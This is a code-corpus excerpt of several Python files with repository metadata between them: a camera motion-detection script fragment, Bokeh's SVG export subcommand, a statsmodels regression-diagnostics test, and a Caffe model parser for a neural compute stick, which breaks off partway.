def analyse(self, a):
global motion_detected, last_still_capture_time
if datetime.datetime.now() > last_still_capture_time + datetime.timedelta(
seconds=mtnMinimumStillSec
):
a = (
np.sqrt(
np.square(a["x"].astype(np.float))
+ np.square(a["y"].astype(np.float))
)
.clip(0, 255)
.astype(np.uint8)
)
# experiment with the following "if" as it may be too sensitive ???
# if there're more than 10 vectors with a magnitude greater than 60, then motion was detected:
if (a > mtnMagnitude).sum() > 10:
logger.debug("Motion detected")
motion_detected = True
def main():
global imgExtension
logger.info("Starting {} {}".format(appName, appVersion))
logger.info("Modus = {}".format(appModus))
check_folders()
if imgFormat == "jpeg":
imgExtension = ".jpg"
else:
imgExtension = "." + imgFormat
if appModus == modus.TESTIMAGE:
start_test_image()
elif appModus == modus.TIMELAPSE:
start_timelapse()
elif appModus == modus.MOTIONIMAGE:
start_motion_image()
elif appModus == modus.MOTIONVIDEO:
start_motion_video()
elif appModus == modus.PIRIMAGE:
start_pir_image()
elif appModus == modus.PIRVIDEO:
start_pir_motion()
else:
logger.error("Invalid modus: {}".format(appModus))
# ********************************************************************************
if __name__ == "__main__":
try:
main()
finally:
logger.debug("{} ended".format(appName))
| 31.966068
| 110
| 0.510209
|
f1bd8f9fea120a41d0ac1b89ce6d2543d98d1a01
| 3,809
|
py
|
Python
|
bokeh/command/subcommands/svg.py
|
DuCorey/bokeh
|
a88e24f34d40499a4608d01da8d706123350b4e6
|
[
"BSD-3-Clause"
] | 1
|
2020-02-06T05:27:53.000Z
|
2020-02-06T05:27:53.000Z
|
bokeh/command/subcommands/svg.py
|
DuCorey/bokeh
|
a88e24f34d40499a4608d01da8d706123350b4e6
|
[
"BSD-3-Clause"
] | null | null | null |
bokeh/command/subcommands/svg.py
|
DuCorey/bokeh
|
a88e24f34d40499a4608d01da8d706123350b4e6
|
[
"BSD-3-Clause"
] | null | null | null |
'''
To generate standalone SVGs for a Bokeh application from a single
Python script, pass the script name to ``bokeh svg`` on the command
line:
.. code-block:: sh
bokeh svg app_script.py
The generated SVGs will be saved in the current working directory with
the name ``app_script.svg``. If there are multiple SVGs within an application,
the subsequent ones will be named ``app_script_1.svg``, ``app_script_2.svg``,
etc.
It is also possible to run the same commmand with jupyter notebooks:
.. code-block:: sh
bokeh svg app_notebook.ipynb
This will generate SVG files named ``app_notebook_{n}.svg`` just like
with a python script.
Applications can also be created from directories. The directory should
contain a ``main.py`` (and any other helper modules that are required) as
well as any additional assets (e.g., theme files). Pass the directory name
to ``bokeh svg`` to generate the SVG:
.. code-block:: sh
bokeh svg app_dir
It is possible to generate SVG files for multiple applications at once:
.. code-block:: sh
bokeh svg app_script.py app_dir
For all cases, it's required to explicitly add a Bokeh layout to
``bokeh.io.curdoc`` for it to appear in the output.
'''
from __future__ import absolute_import
import io
import os
import warnings
from bokeh.io import _get_svgs
from bokeh.models import Plot
from bokeh.util.string import decode_utf8
from .file_output import FileOutputSubcommand
class SVG(FileOutputSubcommand):
''' Subcommand to output applications as standalone SVG files.
'''
#: name for this subcommand
name = "svg"
#: file extension for output generated by this :class:`~bokeh.command.subcommands.file_output.FileOutputSubcommand`
extension = "svg"
help = "Create standalone SVG files for one or more applications"
args = (
FileOutputSubcommand.files_arg("SVG"),
('--height', dict(
metavar='HEIGHT',
type=int,
help="The desired height of the exported layout obj only if it's a Plot instance",
default=None,
)),
('--width', dict(
metavar='WIDTH',
type=int,
help="The desired width of the exported layout obj only if it's a Plot instance",
default=None,
)),
) + FileOutputSubcommand.other_args()
def invoke(self, args):
'''
'''
import selenium.webdriver as webdriver
self.driver = webdriver.PhantomJS(service_log_path=os.path.devnull)
super(SVG, self).invoke(args)
self.driver.quit()
def write_file(self, args, filename, doc):
'''
'''
contents = self.file_contents(args, doc)
for i, svg in enumerate(contents):
if filename == '-':
print(decode_utf8(svg))
else:
if i == 0:
filename = filename
else:
idx = filename.find(".svg")
filename = filename[:idx] + "_{}".format(i) + filename[idx:]
with io.open(filename, "w", encoding="utf-8") as f:
f.write(decode_utf8(svg))
self.after_write_file(args, filename, doc)
def file_contents(self, args, doc):
'''
'''
if args.width is not None or args.height is not None:
layout = doc.roots
if len(layout) != 1 or not isinstance(layout[0], Plot):
warnings.warn("Export called with height or width kwargs on a non-single Plot layout. The size values will be ignored.")
else:
plot = layout[0]
plot.plot_height = args.height or plot.plot_height
plot.plot_width = args.width or plot.plot_width
return _get_svgs(doc, driver=self.driver)
| 29.992126
| 136
| 0.632187
|
874983d5d0b0d4babd2506c1ace1254022b2bf47
| 958
|
py
|
Python
|
venv/lib/python3.8/site-packages/statsmodels/stats/tests/test_outliers_influence.py
|
johncollinsai/post-high-frequency-data
|
88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4
|
[
"MIT"
] | 12
|
2018-09-03T14:48:13.000Z
|
2021-11-28T13:08:15.000Z
|
venv/lib/python3.8/site-packages/statsmodels/stats/tests/test_outliers_influence.py
|
johncollinsai/post-high-frequency-data
|
88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4
|
[
"MIT"
] | 5
|
2022-02-13T14:38:04.000Z
|
2022-02-15T00:13:07.000Z
|
venv/lib/python3.8/site-packages/statsmodels/stats/tests/test_outliers_influence.py
|
johncollinsai/post-high-frequency-data
|
88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4
|
[
"MIT"
] | 6
|
2018-02-18T12:42:41.000Z
|
2020-08-07T10:36:29.000Z
|
import numpy as np
from numpy.testing import assert_almost_equal
from statsmodels.datasets import statecrime
from statsmodels.regression.linear_model import OLS
from statsmodels.stats.outliers_influence import (
reset_ramsey,
variance_inflation_factor,
)
from statsmodels.tools import add_constant
def test_reset_stata():
data = statecrime.load_pandas().data
mod = OLS(data.violent, add_constant(data[["murder", "hs_grad"]]))
res = mod.fit()
stat = reset_ramsey(res, degree=4)
assert_almost_equal(stat.fvalue, 1.52, decimal=2)
assert_almost_equal(stat.pvalue, 0.2221, decimal=4)
exog_idx = list(data.columns).index("urban")
data_arr = np.asarray(data)
vif = variance_inflation_factor(data_arr, exog_idx)
assert_almost_equal(vif, 16.4394, decimal=4)
exog_idx = list(data.columns).index("urban")
vif_df = variance_inflation_factor(data, exog_idx)
assert_almost_equal(vif_df, 16.4394, decimal=4)
| 33.034483
| 70
| 0.751566
|
d956eae5bfcbf99b8477449a239e06a56103c164
| 62,468
|
py
|
Python
|
tool/Controllers/CaffeParser.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 14
|
2018-08-16T09:11:39.000Z
|
2019-12-07T12:54:32.000Z
|
tool/Controllers/CaffeParser.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 2
|
2019-08-23T23:31:10.000Z
|
2020-06-17T09:21:57.000Z
|
tool/Controllers/CaffeParser.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 7
|
2018-10-02T01:46:43.000Z
|
2021-06-04T19:10:47.000Z
|
# Copyright 2017 Intel Corporation.
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors.
# The Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions.
# No part of the Material may be used, copied, reproduced, modified, published,
# uploaded, posted, transmitted, distributed or disclosed in any way without
# Intel's prior express written permission. No license under any patent,
# copyright or other intellectual property rights in the Material is granted to
# or conferred upon you, either expressly, by implication, inducement, estoppel
# or otherwise.
# Any license under such intellectual property rights must be express and
# approved by Intel in writing.
import numpy as np
from Models.NetworkStage import *
from Models.Network import *
from Controllers.CaffeEnumController import *
from Controllers.MiscIO import *
from google.protobuf import message
from google.protobuf import text_format
import os
import ctypes
import sys, pdb
sys.path.insert(0,'caffe/python')
import caffe
from caffe.proto import caffe_pb2
concat_tracker = []
slice_tracker = []
data_type = np.float16
def caffe_search_pre_op(msg, name):
if False:
pass
return None
def get_caffe_kernel_size(layer):
if isConvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
if isPooling(layer.type):
if layer.pooling_param.kernel_w:
return layer.pooling_param.kernel_h, layer.pooling_param.kernel_w
else:
return layer.pooling_param.kernel_size, layer.pooling_param.kernel_size
if isDeconvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
return 0, 0 # Default
def get_caffe_group(layer):
if isConvolution(layer.type):
return layer.convolution_param.group
if isDeconvolution(layer.type):
return layer.convolution_param.group
return 1
def get_caffe_output_channels(layer, prev_output_shape, top, network):
if isConvolution(layer.type):
return layer.convolution_param.num_output
if isFCL(layer.type):
return layer.inner_product_param.num_output
if isReshape(layer.type):
return layer.reshape_param.shape[0]
if (isPooling(layer.type) or isSoftMax(layer.type) or isLRN(layer.type) or
isSigmoid(layer.type) or isTanH(layer.type) or isPower(layer.type) or
isNormalize(layer.type)):
if top is not None:
if (len(top) > 1):
sum_of_k_from_parents = 0
for parent in top:
prev_node = network.search(parent)
sum_of_k_from_parents += prev_node.output.shape[0]
return sum_of_k_from_parents
return prev_output_shape[0]
if (isEltwise(layer.type) or isBatchNorm(layer.type) or
isScale(layer.type) or isPReLU(layer.type)):
return prev_output_shape[0]
if isDeconvolution(layer.type):
return layer.convolution_param.num_output
if isFlatten(layer.type):
return prev_output_shape[0] * \
prev_output_shape[1] * prev_output_shape[2]
if isPermute(layer.type):
return prev_output_shape[layer.permute_param.order[1]-1]
if isPriorBox(layer.type):
return 1
# print("Parse Warning: Default OutputChannels being used.")
return 1 # default case
def get_caffe_op_radix(layer):
"""
Get the radix of the operation from this layer (single kernel dimensions).
Currently assumes square matrices due to no example vector kernels in caffe.
TODO: Find some examples
:param layer:
:return:
"""
if isConvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
elif isLRN(layer.type):
return 0, layer.lrn_param.local_size
elif isPooling(layer.type):
if layer.pooling_param.kernel_size == 0:
if(layer.pooling_param.global_pooling):
return -1, -1
if layer.pooling_param.kernel_w:
return layer.pooling_param.kernel_h, layer.pooling_param.kernel_w
else:
return layer.pooling_param.kernel_size, layer.pooling_param.kernel_size
elif isPooling(layer.type):
return layer.pooling_param.kernel_size, layer.pooling_param.kernel_size
elif isDeconvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
else:
return 1, 1
def get_caffe_op_padding(layer):
if isConvolution(layer.type) or isDeconvolution(layer.type):
if layer.convolution_param.pad_w or layer.convolution_param.pad_h:
return layer.convolution_param.pad_h, layer.convolution_param.pad_w
elif layer.convolution_param.pad:
return layer.convolution_param.pad[0], layer.convolution_param.pad[0]
if isPooling(layer.type):
if layer.pooling_param.pad_w or layer.pooling_param.pad_h:
return layer.pooling_param.pad_h, layer.pooling_param.pad_w
elif layer.pooling_param.pad:
return layer.pooling_param.pad, layer.pooling_param.pad
return 0, 0 # Default Case
def get_caffe_op_stride(layer):
"""
Gets a layer's stride for the operation. Looks like (for now) there's only one stride dimension supported in caffe?
:param layer:
:return: a tuple for stride dimensions X,Y
"""
if isConvolution(layer.type):
if layer.convolution_param.stride_w:
return layer.convolution_param.stride_h, layer.convolution_param.stride_w
elif layer.convolution_param.stride:
return layer.convolution_param.stride[0], layer.convolution_param.stride[0]
if isPooling(layer.type):
if layer.pooling_param.stride_w:
return layer.pooling_param.stride_h, layer.pooling_param.stride_w
elif layer.pooling_param.stride:
return layer.pooling_param.stride, layer.pooling_param.stride
if isDeconvolution(layer.type):
if layer.convolution_param.stride_w:
return layer.convolution_param.stride_h, layer.convolution_param.stride_w
elif layer.convolution_param.stride:
return layer.convolution_param.stride[0], layer.convolution_param.stride[0]
return 1, 1 # Default Case
def get_caffe_params(layer, blobs):
global data_type
if isLRN(layer.type):
# The latest 0 is just for alignment, it can be removed
# after UsbLink has been fixed
return None, np.array(
[layer.lrn_param.k, layer.lrn_param.alpha, layer.lrn_param.beta, 0], dtype=data_type)
elif isConvolution(layer.type) or isDeconvolution(layer.type):
if layer.convolution_param.bias_term:
return blobs[layer.name][0].data.astype(
dtype=data_type), blobs[layer.name][1].data.astype(dtype=data_type)
else:
return blobs[layer.name][0].data.astype(dtype=data_type), None
elif isFCL(layer.type):
if layer.inner_product_param.bias_term:
return blobs[layer.name][0].data.astype(
dtype=data_type), blobs[layer.name][1].data.astype(dtype=data_type)
else:
return blobs[layer.name][0].data.astype(dtype=data_type), None
elif isBatchNorm(layer.type):
if blobs[layer.name][2].data[0] == 0:
mean = np.zeros(blobs[layer.name][0].data.shape)
var = np.zeros(blobs[layer.name][1].data.shape) + \
layer.batch_norm_param.eps
else:
mean = blobs[layer.name][0].data * \
(1 / blobs[layer.name][2].data[0])
var = blobs[layer.name][1].data * \
(1 / blobs[layer.name][2].data[0]) + layer.batch_norm_param.eps
mult = np.reciprocal(np.sqrt(var))
bias = -mean * mult
return mult.astype(dtype=data_type), bias.astype(dtype=data_type)
elif isScale(layer.type):
if layer.scale_param.bias_term:
return blobs[layer.name][0].data.astype(
dtype=data_type), blobs[layer.name][1].data.astype(dtype=data_type)
else:
return blobs[layer.name][0].data.astype(dtype=data_type), None
elif isPReLU(layer.type):
return None, blobs[layer.name][0].data
elif isNormalize(layer.type):
return blobs[layer.name][0].data.astype(dtype=data_type)
else:
return None, None
def caffe_apply_minor_op(network, layer, top):
"""
Searches through the network for the applicable node that we want to attach a minor op to and attaches it.
:param network:
:param layer:
:return:
"""
if isReLU(layer.type) or isELU(layer.type):
if top is not None and not isinstance(top[0], str):
top = top[0]
for prevlayer in top:
if isReLU(layer.type):
applicable_node = network.search(prevlayer)
if layer.relu_param.negative_slope == 0.0:
applicable_node.postOp = StageType.relu
else:
applicable_node.postOp = StageType.leaky_relu
applicable_node.post_param1 = layer.relu_param.negative_slope
if isELU(layer.type):
applicable_node = network.search(prevlayer)
applicable_node.postOp = StageType.elu
applicable_node.post_param1 = layer.elu_param.alpha
if len(top) == 1:
# This should be always here, but for now we don't support this
# when applying ReLU to a concat
applicable_node.unprocessed_name = layer.top[0]
applicable_node.name = set_string_range(
layer.top[0], 100).encode('ascii')
elif isConcat(layer.type):
global concat_tracker
concat_tracker.append((layer.top[0], layer.bottom))
elif isSlice(layer.type):
global slice_tracker
slice_tracker.append(
(layer.top, layer.bottom, layer.slice_param.slice_point))
else:
throw_error(ErrorTable.StageTypeNotSupported, layer.type)
def create_input_layer(myriad_conf, arguments, network, input_shape, input_name):
node = NetworkStage(input_name,
None, # top
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.none,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
input_shape[3],
input_shape[2],
input_shape[1],
# fh, fw
1,
1,
# Output Channels (K)
input_shape[1],
# Taps, Bias,
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
arguments,
new_x=0,
new_y=0,
new_c=0)
network.attach(node)
return node
def parse_caffe(arguments, myriad_conf, debug=False, file_gen=False):
path = arguments.net_description
weights = arguments.net_weights
input_image = arguments.image
outputNodeName = arguments.output_node_name
inputNodeName = arguments.input_node_name
raw_scale = arguments.raw_scale
filename = arguments.outputs_name
mean = arguments.mean
channel_swap = arguments.channel_swap
caffe.set_mode_cpu()
description = path
if weights is None:
open("zero_weights.caffemodel", "wb").close()
weights = "zero_weights.caffemodel"
print("\033[91m****** WARNING: using empty weights ******\033[0m")
if not os.path.isfile(weights):
throw_error(ErrorTable.ArgumentErrorWeights)
try:
net = caffe.Net(description, weights, caffe.TEST)
except MemoryError:
throw_error(ErrorTable.CaffeMemoryError)
try:
f = open(description)
file_contents = f.read()
f.close()
except BaseException:
throw_error(ErrorTable.ArgumentErrorDescription)
msg = caffe_pb2.NetParameter() # Parse via Caffe's NetParameter
text_format.Merge(str(file_contents), msg)
# If out inputNodeName is after a split, we have to start one step before in order
# to run the split and fill all the inputs for all the paths before concat
layers = msg.layer
if len(layers) == 0:
layers = msg.layers
startNodeName = inputNodeName
if layers[0].type == 'Input':
try:
input_shape = layers[0].input_param.shape[0].dim
input_bottom = layers[0].top[0] # Input name, normally "data"
except BaseException:
throw_error(ErrorTable.InputSyntaxNotSupported)
else:
try:
input_shape = msg.input_shape[0].dim
input_bottom = layers[0].bottom[0] # Input name, normally "data"
except BaseException:
throw_error(ErrorTable.InputSyntaxNotSupported)
if(input_shape[0] != 1):
throw_error(ErrorTable.AttemptedBatchMode)
if inputNodeName:
input_bottom = net.bottom_names[inputNodeName][0]
for i, layername in enumerate(net._layer_names):
if input_bottom in net.top_names[layername]:
if net.layers[i].type == 'Split':
input_bottom = net.bottom_names[layername][0]
startNodeName = layername
input_shape = [
net.blobs[input_bottom].shape[0],
net.blobs[input_bottom].shape[1],
net.blobs[input_bottom].shape[2],
net.blobs[input_bottom].shape[3]]
# Network
if input_image is None or input_image == "Debug":
try:
input_data = np.ones(input_shape).astype(data_type)
except BaseException:
throw_error(ErrorTable.InputSyntaxNotSupported)
input_data = np.random.uniform(-1, 1,
input_shape).astype(dtype=data_type)
else:
input_data = parse_img(
input_image,
input_shape,
raw_scale=raw_scale,
mean=mean,
channel_swap=channel_swap)
if outputNodeName is None:
outputNodeName = net.outputs[0]
network = Network(msg.name, input_data)
arguments.network = network
prev_output_shape = [input_data[0].shape]
global concat_tracker
last_layer = None
first_layer = None
nlayers = len(layers)
# Create input layer
create_input_layer(myriad_conf, arguments, network, input_shape, input_bottom)
inshape = input_shape
prev_output_shape = [input_data[0].shape]
top = None
# Check if last layer's "name" & "top" have same name
for idx, layer in enumerate(layers):
if(net.outputs[0] in layer.top):
if(layer.name != layer.top[0]):
throw_warning(ErrorTable.OutputNodeNameTopMismatch,
(layer.name, layer.top[0]))
for idx, layer in enumerate(layers):
# debug = True
if debug:
print("------------")
print(layer)
if layer.type == 'Input':
continue
if inputNodeName:
if inputNodeName == layer.name:
first_layer = layer
elif first_layer is None:
continue
if isEltwise(layer.type) and len(
layer.bottom) == 2 and layer.bottom[0] == input_bottom:
tmp = layer.bottom[0]
layer.bottom[0] = layer.bottom[1]
layer.bottom[1] = tmp
# First Node's top has to be None, but also other layers that
# have the same bottom of the first layer
curslicing = []
if layer.bottom[0] == input_bottom:
top = None
prev_output_shape = [input_data[0].shape]
else:
# Check if our bottoms come from Slice
for slice in slice_tracker:
for i in range(len(slice[0])):
for j in range(len(layer.bottom)):
if layer.bottom[j] == slice[0][i]:
# It's one of Slice outputs, take its input
# 4 dims, second is nplanes
inputplanes = net.blobs[slice[1][0]].shape[1]
start = 0 if i == 0 else slice[2][i - 1]
end = slice[2][i] if i < len(
slice[2]) else inputplanes
if slice[1][0] == input_bottom:
curslicing.append([None, start, end])
else:
curslicing.append([slice[1][0], start, end])
layer.bottom[j] = slice[1][0]
break
# Convert layer.bottom, which is a protobuf object, into a list in
# order to be editable
top = []
for obj in layer.bottom:
top.append(obj)
# Concat check
if len(concat_tracker) != 0:
# We track all previous concats, as we may have a many-to-many
# connection
for concat in concat_tracker:
for i in range(len(top)):
if concat[0] == top[i]:
# If the next layer will try to attach to the
# non-existant concat intermediary node.
top[i] = concat[1]
if top[0] == input_bottom:
top = None
prev_output_shape = [input_data[0].shape]
else:
prev_output_shape = []
nodes = network.search_several(top)
if isConcat(layer.type):
for node_i, node in enumerate(nodes):
node.concat_axis = layer.concat_param.axis
# nodes is a list, which can contain nodes or list of nodes, in
# case of concat
if len(nodes) == 0:
throw_error(ErrorTable.GraphConstructionFailure, top)
for i, node in enumerate(nodes):
if node == 0:
throw_error(
ErrorTable.GraphConstructionFailure, top[i])
if hasattr(node, '__iter__'):
# node is a list of nodes, i.e. nodes that make a
# concat
shape = node[0].output.shape
for i in range(len(node)):
if i > 0:
if node[i].concat_axis == 1:
if (shape[1] != node[i].output.shape[1] or
shape[2] != node[i].output.shape[2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
shape = (shape[0] + node[i].output.shape[0], shape[1], shape[2])
elif node[i].concat_axis == 2:
if (shape[0] != node[i].output.shape[0] or
shape[2] != node[i].output.shape[2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
shape = (shape[0], shape[1]+ node[i].output.shape[1], shape[2])
else:
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
prev_output_shape.append(shape)
else:
prev_output_shape.append(node.output.shape)
inshape = prev_output_shape[0]
# Only eltwise and concat supports multiple inputs now
if isEltwise(layer.type) or isConcat(layer.type):
for i in range(len(prev_output_shape)):
if i > 0:
if isEltwise(layer.type) or (isConcat(layer.type) and layer.concat_param.axis == 1):
if (inshape[1] != prev_output_shape[i][1] or
inshape[2] != prev_output_shape[i][2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
inshape = (max(inshape[0], prev_output_shape[i][0]), inshape[1], inshape[2])
else:
# We have a concat on axis != 1. Most probably axis 2.
if (inshape[0] != prev_output_shape[i][0] or
inshape[2] != prev_output_shape[i][2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
inshape = (inshape[0], max(inshape[1], prev_output_shape[i][1]), inshape[2])
if isDropout(layer.type):
continue
if isBatchNorm(layer.type) or isScale(layer.type):
# Check if absorption is possible into a convolution
node = network.search(layer.bottom[0])
if node != 0 and (
node.op == StageType.convolution or node.op == StageType.depthwise_convolution):
w, b = get_caffe_params(layer, net.params)
# Transpose in order to be able to use dimension broadcasting
node.taps = (node.taps.T * w).T
if node.bias is not None:
if b is not None:
node.bias = node.bias * w + b
else:
node.bias = node.bias * w
else:
if b is not None:
node.addBias(np.array(b).astype(np.float16))
node.name = node.unprocessed_name + '/' + layer.name
node.changeName(node.name)
node.alias.append(node.unprocessed_name)
node.alias.append(layer.name)
if layer.name == outputNodeName:
break
continue
if isInnerLRN(layer):
# Square the inputs
network.attach(
NetworkStage(layer.name + "_Square",
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.square,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
0,
0,
# Output Channels (K)
inshape[0],
# Taps, Bias
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
# Average pooling of squares
network.attach(
NetworkStage(layer.name + "_AvgPool",
[layer.name + "_Square"],
StorageOrder.orderZYX,
# Padding
(layer.lrn_param.local_size - 1) // 2,
(layer.lrn_param.local_size - 1) // 2,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.average_pooling,
# Radix and stride
layer.lrn_param.local_size,
layer.lrn_param.local_size,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
layer.lrn_param.local_size,
layer.lrn_param.local_size,
# Output Channels (K)
inshape[0],
# Taps, Bias
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
# (1 + alpha * prev) ^ -beta
network.attach(
NetworkStage(layer.name + "_InnerLRN",
[layer.name + "_AvgPool"],
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.innerlrn,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
1,
1,
# Output Channels (K)
inshape[0],
# Taps
None,
TapsOrder.orderKCHW,
# Biases (lrn parameters here)
np.array([layer.lrn_param.k, layer.lrn_param.alpha,
layer.lrn_param.beta, 0], dtype=data_type),
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
# Multiply input with previous stage output
if top is None:
top = [layer.name + "_InnerLRN", None]
else:
top = [top[0], layer.name + "_InnerLRN"]
network.attach(
NetworkStage(layer.name,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.eltwise_prod,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
1,
1,
# Output Channels (K)
inshape[0],
# Taps, Bias,
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isReshape(layer.type):
if(len(layer.reshape_param.shape.dim) == 3):
new_shape_X = 1
new_shape_Y = layer.reshape_param.shape.dim[2]
new_shape_C = layer.reshape_param.shape.dim[1]
else:
new_shape_X = layer.reshape_param.shape.dim[3]
new_shape_Y = layer.reshape_param.shape.dim[2]
new_shape_C = layer.reshape_param.shape.dim[1]
network.attach(
NetworkStage(layer.name,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.reshape,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
1,
1,
# Output Channels (K)
inshape[0],
# Taps, Bias,
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
arguments,
new_x = new_shape_X,
new_y = new_shape_Y,
new_c = new_shape_C)
)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isPriorBox(layer.type):
params = np.array((prev_output_shape[1][1], # img H
prev_output_shape[1][2], # img W
len(layer.prior_box_param.min_size),
len(layer.prior_box_param.max_size),
len(layer.prior_box_param.aspect_ratio),
len(layer.prior_box_param.variance),
layer.prior_box_param.flip,
layer.prior_box_param.clip),
dtype=np.dtype("<f4"))
params = np.append(params, layer.prior_box_param.min_size[0:])
params = np.append(params, layer.prior_box_param.max_size[0:])
params = np.append(params, layer.prior_box_param.aspect_ratio[0:])
params = np.append(params, layer.prior_box_param.variance[0:])
if (layer.prior_box_param.HasField("step_w") and
layer.prior_box_param.HasField("step_h")):
# We don't check for both step and step_h/step_h being set
# because caffe should yeld an error before this.
params = np.append(params, layer.prior_box_param.step_w)
params = np.append(params, layer.prior_box_param.step_h)
elif (layer.prior_box_param.HasField("step")):
params = np.append(params, layer.prior_box_param.step)
params = np.append(params, layer.prior_box_param.step)
else:
params = np.append(params, 0)
params = np.append(params, 0)
params = np.append(params, layer.prior_box_param.offset)
params = params.astype(dtype = np.dtype("<f4"))
node = NetworkStage(layer.name, top, StorageOrder.orderZYX,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
get_caffe_op_type(layer), # op_type
1, 1, # op_x, op_y,
1, 1, # sx, sy,
inshape[2], inshape[1], inshape[0], # X, Y, Z
0, 0, # fw, fh
get_caffe_output_channels(layer, inshape, top, network),
None, None, None, # taps, taps_order, bias,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
myriad_config=myriad_conf, args=arguments,
opParams=params)
network.attach(node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (isDetectionOutput(layer.type)):
detection_param = layer.detection_output_param
share_location = 1 if detection_param.share_location else 0
det_out_dtype = np.dtype("<i4, <i4, <i4, <f4, <i4, <i4, <i4, <f4, <i4, <f4")
op_params = np.array((detection_param.num_classes,
share_location,
detection_param.background_label_id,
detection_param.nms_param.nms_threshold,
detection_param.nms_param.top_k,
detection_param.code_type,
detection_param.keep_top_k,
detection_param.confidence_threshold,
detection_param.variance_encoded_in_target,
detection_param.nms_param.eta), det_out_dtype)
op_params = op_params.flatten()
op_params = op_params.view("<f4")
node = NetworkStage(layer.name, top, StorageOrder.orderZYX,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
get_caffe_op_type(layer),
1, 1,
1, 1,
inshape[2], inshape[1], inshape[0], # X, Y, Z
0, 0,
get_caffe_output_channels(layer, inshape, top, network),
taps, TapsOrder.orderKCHW, None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0, myriad_conf, args=arguments,
opParams=op_params,
new_y=detection_param.keep_top_k)
network.attach(node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (isPower(layer.type) or
isNormalize(layer.type) or
isPermute(layer.type)):
taps = None
(new_x, new_y, new_c) = (0, 0, 0)
if isPower(layer.type):
op_params = np.array((layer.power_param.shift,
layer.power_param.scale,
layer.power_param.power),
dtype = np.dtype("<f4"))
elif isNormalize(layer.type):
op_params = np.array((layer.norm_param.across_spatial,
layer.norm_param.channel_shared),
dtype = np.dtype("int32"))
taps = get_caffe_params(layer, net.params)
elif isPermute(layer.type):
caffe_perm_ord = np.array(layer.permute_param.order[1:], dtype = "i4")
if(np.count_nonzero(caffe_perm_ord) != len(caffe_perm_ord)):
raise Exception("Permute on batch axis is not supported. \
Layer = {0}".format(layer.name))
perm_ord = np.arange(3)
# Caffe axis are NCHW(0,1,2,3). Myriad axis are CHW(0,1,2).
# Hence substract 1.
perm_ord[0 : len(caffe_perm_ord)] = caffe_perm_ord - 1
new_c, new_y, new_x = np.array(inshape)[perm_ord]
# Decode the caffe permute order to myriad permute order.
ord_decoder = np.array([2, 0, 1], dtype = "i4")
myriad_perm_ord = ord_decoder[np.roll(perm_ord, -1)]
